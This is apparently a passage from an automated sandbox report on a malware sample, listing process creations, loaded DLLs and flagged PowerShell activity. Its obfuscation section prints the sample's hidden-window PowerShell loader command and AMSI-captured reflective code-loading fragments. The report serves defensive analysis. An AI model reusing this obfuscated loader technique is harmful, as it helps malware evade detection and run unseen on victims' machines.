Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: MPkM9Dd99B.exeStatic file information: File size 1352888 > 1048576
Source: MPkM9Dd99B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((subsocially $Falkeblikkenes $tankbilernes), (embedernes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Krampetrkningen = [AppDomain]::CurrentDomain.GetAss
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Prmie)), $Pindemadderne).DefineDynamicModule($Kaleidoscopical, $false).DefineType($Copart201, $Surmlksproduktets, [System.MulticastDel
Suspicious powershell command line found
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "Jump to behavior
